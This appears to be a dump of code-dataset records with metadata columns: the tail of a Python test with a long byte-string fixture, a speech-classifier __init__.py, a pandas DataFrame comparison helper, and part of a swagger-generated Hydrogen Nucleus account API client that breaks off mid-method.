b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA',
800000)]
        f = List("test", b"bla")
        self.assertEqual([i for i in f], expected)
    def test_length(self):
        f = List("test")
        self.assertEqual(f.length(), 515)
        self.assertEqual(len(list(f)), f.length())
    def test_default(self):
        l = List("test", default=b'Test')
        self.assertEqual(first(l), Value(b'Test'))
if __name__ == '__main__':
    main()
| 113.39653
| 133
| 0.705812
| 7,033
| 176,445
| 17.70482
| 0.082468
| 0.891791
| 0.901484
| 1.780626
| 0.952674
| 0.947935
| 0.942546
| 0.935833
| 0.9327
| 0.9294
| 0
| 0.02018
| 0.230491
| 176,445
| 1,555
| 134
| 113.469453
| 0.896904
| 0.009176
| 0
| 0.802372
| 0
| 0.030962
| 0.703101
| 0.67521
| 0
| 1
| 0.000051
| 0
| 0.003294
| 1
| 0.002635
| false
| 0.01581
| 0.003953
| 0
| 0.007246
| 0.001318
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 15
|
d705d67c509c0b07fa068e7903002176ba749533
| 190
|
py
|
Python
|
examples/DeepWisdom/at_speech/classifier/__init__.py
|
zichuan-scott-xu/automl-workflow
|
d108e55da943775953b9f1801311a86ac07e58a0
|
[
"Apache-2.0"
] | 3
|
2020-12-15T02:40:43.000Z
|
2021-01-14T02:32:13.000Z
|
examples/DeepWisdom/at_speech/classifier/__init__.py
|
zichuan-scott-xu/automl-workflow
|
d108e55da943775953b9f1801311a86ac07e58a0
|
[
"Apache-2.0"
] | null | null | null |
examples/DeepWisdom/at_speech/classifier/__init__.py
|
zichuan-scott-xu/automl-workflow
|
d108e55da943775953b9f1801311a86ac07e58a0
|
[
"Apache-2.0"
] | 4
|
2021-01-07T05:41:38.000Z
|
2021-04-07T08:02:22.000Z
|
from at_speech.classifier.sklearn_lr import SLLRLiblinear, SLLRSag
from at_speech.classifier.cnn import CNNClassifier
from at_speech.classifier.thinresnet34_cls import ThinResnet34Classifier
| 63.333333
| 72
| 0.9
| 24
| 190
| 6.916667
| 0.583333
| 0.108434
| 0.216867
| 0.39759
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.022472
| 0.063158
| 190
| 3
| 72
| 63.333333
| 0.910112
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d7072ef4909e6f6490a0f153055cb3015fd902f7
| 168
|
py
|
Python
|
tests/helpers.py
|
jackson-waschura/marine-acoustics-2021
|
300a5856de402d52342523c6138751a5ca7e07a8
|
[
"MIT"
] | null | null | null |
tests/helpers.py
|
jackson-waschura/marine-acoustics-2021
|
300a5856de402d52342523c6138751a5ca7e07a8
|
[
"MIT"
] | null | null | null |
tests/helpers.py
|
jackson-waschura/marine-acoustics-2021
|
300a5856de402d52342523c6138751a5ca7e07a8
|
[
"MIT"
] | 2
|
2022-01-13T16:16:28.000Z
|
2022-01-20T17:39:51.000Z
|
from pandas.testing import assert_frame_equal
def assert_frame_equal_no_index(df1, df2):
    assert_frame_equal(df1.reset_index(drop=True), df2.reset_index(drop=True))
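# Usage sketch (editor's addition; the DataFrames below are made up for illustration):
# assert_frame_equal_no_index passes when the values match even though the index labels differ.
if __name__ == "__main__":
    import pandas as pd
    assert_frame_equal_no_index(
        pd.DataFrame({"x": [1, 2]}, index=[10, 11]),
        pd.DataFrame({"x": [1, 2]}),
    )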
| 42
| 78
| 0.827381
| 28
| 168
| 4.607143
| 0.535714
| 0.255814
| 0.372093
| 0.27907
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.025806
| 0.077381
| 168
| 4
| 78
| 42
| 0.806452
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0.333333
| false
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
ad9a826d7755b6ad7783c30d7030332d476d292b
| 135,469
|
py
|
Python
|
atom/nucleus/python/nucleus_api/api/account_api.py
|
AbhiGupta03/SDK
|
f3a61aae7a847f07f0c22a154ca88dc378e9d25e
|
[
"Apache-2.0"
] | null | null | null |
atom/nucleus/python/nucleus_api/api/account_api.py
|
AbhiGupta03/SDK
|
f3a61aae7a847f07f0c22a154ca88dc378e9d25e
|
[
"Apache-2.0"
] | null | null | null |
atom/nucleus/python/nucleus_api/api/account_api.py
|
AbhiGupta03/SDK
|
f3a61aae7a847f07f0c22a154ca88dc378e9d25e
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Hydrogen Nucleus API
The Hydrogen Nucleus API # noqa: E501
OpenAPI spec version: 1.9.5
Contact: info@hydrogenplatform.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from nucleus_api.api_client import ApiClient
class AccountApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
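# Usage sketch (editor's note, not part of the generated client): the wrapper is constructed
# with an ApiClient, and each endpoint method can be called synchronously (the default) or
# asynchronously via async_req=True, as the docstrings below describe. The `account` payload
# here is assumed/hypothetical.
#   api = AccountApi(ApiClient())
#   created = api.create_account_using_post(account)                 # blocks until done
#   thread = api.create_account_using_post(account, async_req=True)  # returns a thread
#   created = thread.get()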
def create_account_allocation_mapping_using_post(self, alloc_request, **kwargs): # noqa: E501
"""Create an account allocation # noqa: E501
Create an account-allocation mapping for an account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_account_allocation_mapping_using_post(alloc_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param AccountAllocationMapping alloc_request: allocRequest (required)
:return: AccountAllocationMapping
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_account_allocation_mapping_using_post_with_http_info(alloc_request, **kwargs) # noqa: E501
else:
(data) = self.create_account_allocation_mapping_using_post_with_http_info(alloc_request, **kwargs) # noqa: E501
return data
def create_account_allocation_mapping_using_post_with_http_info(self, alloc_request, **kwargs): # noqa: E501
"""Create an account allocation # noqa: E501
Create an account-allocation mapping for an account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_account_allocation_mapping_using_post_with_http_info(alloc_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param AccountAllocationMapping alloc_request: allocRequest (required)
:return: AccountAllocationMapping
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['alloc_request'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_account_allocation_mapping_using_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'alloc_request' is set
if self.api_client.client_side_validation and ('alloc_request' not in params or
params['alloc_request'] is None): # noqa: E501
raise ValueError("Missing the required parameter `alloc_request` when calling `create_account_allocation_mapping_using_post`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'alloc_request' in params:
body_params = params['alloc_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account_allocation', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AccountAllocationMapping', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_account_status_using_post(self, account_status_request, **kwargs): # noqa: E501
"""Create an account status # noqa: E501
Create an account status record for an account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_account_status_using_post(account_status_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param AccountStatus account_status_request: accountStatusRequest (required)
:return: AccountStatus
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_account_status_using_post_with_http_info(account_status_request, **kwargs) # noqa: E501
else:
(data) = self.create_account_status_using_post_with_http_info(account_status_request, **kwargs) # noqa: E501
return data
def create_account_status_using_post_with_http_info(self, account_status_request, **kwargs): # noqa: E501
"""Create an account status # noqa: E501
Create an account status record for an account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_account_status_using_post_with_http_info(account_status_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param AccountStatus account_status_request: accountStatusRequest (required)
:return: AccountStatus
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_status_request'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_account_status_using_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_status_request' is set
if self.api_client.client_side_validation and ('account_status_request' not in params or
params['account_status_request'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_status_request` when calling `create_account_status_using_post`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'account_status_request' in params:
body_params = params['account_status_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account_status', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AccountStatus', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_account_type_using_post(self, account_type_request, **kwargs): # noqa: E501
"""Create an account type # noqa: E501
Create a new account type for your firm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_account_type_using_post(account_type_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param AccountType account_type_request: accountTypeRequest (required)
:return: AccountType
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_account_type_using_post_with_http_info(account_type_request, **kwargs) # noqa: E501
else:
